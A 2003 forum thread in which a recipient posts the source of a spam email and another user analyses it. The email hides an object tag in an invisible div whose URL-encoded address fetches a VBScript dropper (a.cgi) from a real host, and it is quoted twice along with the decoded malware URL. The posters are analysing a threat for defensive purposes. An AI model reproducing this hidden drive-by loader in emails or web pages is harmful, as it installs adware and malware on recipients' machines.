Weird mail trying top get "a.cgi", any ideas ?

  • Thread starter Thread starter Maxime Ducharme
  • Start date Start date
M

Maxime Ducharme

Hi,
I received a suspicious email which seems to be an exploit
of OE to infect people with a trojan or something like that.


Here's how the email source look like (I removed SMTP IPs & received
headers):

=================== BEGIN SOURCE =================
Message-ID: <[email protected]>
From: "Lorna Roach" <[email protected]>
Reply-To: "Lorna Roach" <[email protected]>
To: <[email protected]>, <[email protected]>
Subject: Hey
Date: Wed, 03 Sep 03 22:41:51 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="AF3E6...967056.7.08E03F7"
X-Priority: 3
X-MSMail-Priority: Normal
X-Return-Path: (e-mail address removed)


--AF3E6...967056.7.08E03F7
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<head>
<div style=3D"display.none"><object data=3D"http://63.246.=
%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
</head>
<body>
<p>Hey,</p>
<p>How have you been?&nbsp; What have you been doing lately?</p>
<p>Ive just been at home doing nothing :( bored at uni etc.</p>
<p>Anyway's lets catch up soon,</p>
<p>Luv,<br>You know who ;)</p>
<p>&nbsp;</p>
</body>
</html>

--AF3E6...967056.7.08E03F7--
=================== END SOURCE =================


This code tries to download this file :

http://63.246.130.201/cgi-bin/a.cgi

This host doesnt answer my pings and his tcp port 80 is stealthed.

I didnt find anything on Google yet.

Someone recognize a virus in this or I am targeted by someone ?

I do not like the fact that the email is targeted at 2 specific address
of our organisation.

Thanks for any reply
 
I saw my first of these last night and have had a couple more reports
this morning...
I received a suspicious email which seems to be an exploit
of OE to infect people with a trojan or something like that.
Click to expand...

Close, yes...
Here's how the email source look like (I removed SMTP IPs & received
headers):
Click to expand...

If you would not mind, I'd like to know the originating IP (or mail server).
If' you'd rather not post it publicly, please send it to me via Email.

<head>
<div style=3D"display.none"><object data=3D"http://63.246.=
%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
Click to expand...

"URL escaped" encoding of a URl to a file called a.cgi which is a VBScript that
drops a small .EXE (named drg.exe) and runs it. drg.exe is a "downloader" that
pulls down a copy of the SurferBar IE toolbar and registers it via regsvr32.

In turn the toolbar drops another .EXE (winsvr32.exe) into "c:\program files"
(that path is hard-coded) and runs it. This .EXE is a "guardian" that runs a
10-second sleep loop making sure that its own auto-start and two of SurferBar's
registry configuration settings are present. The SurferBar toolbar also makes
a large nnumber of (pretty tastelessly named) shortcuts in your Start menu and
in the "Programs" sub-menu thereunder...
This code tries to download this file :

http://63.246.130.201/cgi-bin/a.cgi
Click to expand...

Yep -- that's what the above encoded URL decodes to...
This host doesnt answer my pings and his tcp port 80 is stealthed.
Click to expand...

Yes -- it does seem rather dead now, but last night I could d/l that file and
the SurferBar toolbar .DLL the downloader is programmed to grab. The main
surferbar.com site (63.246.130.200) was pretty sad -- all the links were to
some other site (kanoodle.com ??) and were dead, much as www.surferbar.com
seems to be now... (Hopefully this means the hosting company has closed
surferbar.com down...)
I didnt find anything on Google yet.
Click to expand...

Try Google Groups and search for "surferbar". There were a couple of dozen hits
going back 2 or 3 days last night.
Someone recognize a virus in this or I am targeted by someone ?
Click to expand...

AFAICT, it is not viral, but this "seed" Email seems to have been quite widely
spammed.
 
Back
Top